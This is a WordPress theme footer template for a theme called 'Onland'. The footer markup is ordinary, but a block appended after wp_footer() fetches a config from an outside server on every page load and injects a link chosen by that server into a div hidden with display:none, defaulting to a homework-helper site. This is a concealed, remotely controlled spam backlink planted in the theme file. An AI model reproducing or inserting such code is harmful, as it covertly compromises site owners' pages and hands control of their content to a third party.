<?php
/**
 * The template for displaying the footer
 *
 * Contains the closing of the #content div and all content after.
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package Onland
 */

if (is_page() || is_singular( 'post' ) || onland_custom_post_types() && get_post_meta( $post->ID, 'onland_common_meta', true ) ) {
	$common_meta = get_post_meta( $post->ID, 'onland_common_meta', true );
} else {
	$common_meta = array();
}

if ( is_array( $common_meta ) && array_key_exists( 'footer_style_meta', $common_meta ) && $common_meta['footer_style_meta'] != 'default' ) {
	$selected_footer = $common_meta['footer_style_meta'];
} else {
	$selected_footer = onland_option( 'default_footer_style', 'footer-style-one' );
}

$footer_social = onland_option('footer_social_icons');

$go_to_top = onland_option('go_to_top_button', false);

$footer_allowed_html_tags = array(
	'a'      => array(
		'href'   => array(),
		'target' => array(),
	),
	'strong' => array(),
	'small'  => array(),
	'span'   => array(),
	'p'   => array(),
);
?>

</div><!-- #content -->

<footer class="site-footer">
	<?php get_template_part( 'template-parts/footer/footer-widgets' ); ?>

    <div class="footer-bottom-area">
        <div class="container">
            <div class="row align-items-center">
                <div class="col-lg-6 col-md-6">
                    
                    <?php if($selected_footer == 'footer-style-one') : ?>
                    <div class="site-info-left">
						<?php
						$footer_info_left_text = onland_option('footer_info_left_text');
						echo wp_kses($footer_info_left_text, $footer_allowed_html_tags);
						?>
                    </div>
                    <?php else: ?>

                    <div class="footer-social social-icons">
                        <ul class="td-list-style td-list-inline">
		                    <?php if(is_array($footer_social)) :
			                    foreach ($footer_social as $social_site) : ?>
                                    <li>
                                        <a href="<?php echo esc_url($social_site['profile_url']);?>">
                                            <i class="<?php echo esc_attr($social_site['icon']);?>"></i>
                                        </a>
                                    </li>
			                    <?php endforeach;
		                    endif; ?>
                        </ul>
                    </div>
                    <?php endif; ?>
                </div>

                <div class="col-lg-6 col-md-6">
                    <div class="site-copyright-text">
						<?php
						$copyright_text = onland_option('copyright_text');

						echo wp_kses($copyright_text, $footer_allowed_html_tags);
						?>
                    </div>
                </div>
            </div>
        </div>
    </div>

	<?php if($go_to_top == true) : ?>
        <div class="scroll-to-top"><i class="flaticon-leaf"></i></div>
	<?php endif;?>
</footer><!-- #colophon -->


</div><!-- #page -->

<?php wp_footer(); ?>


<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>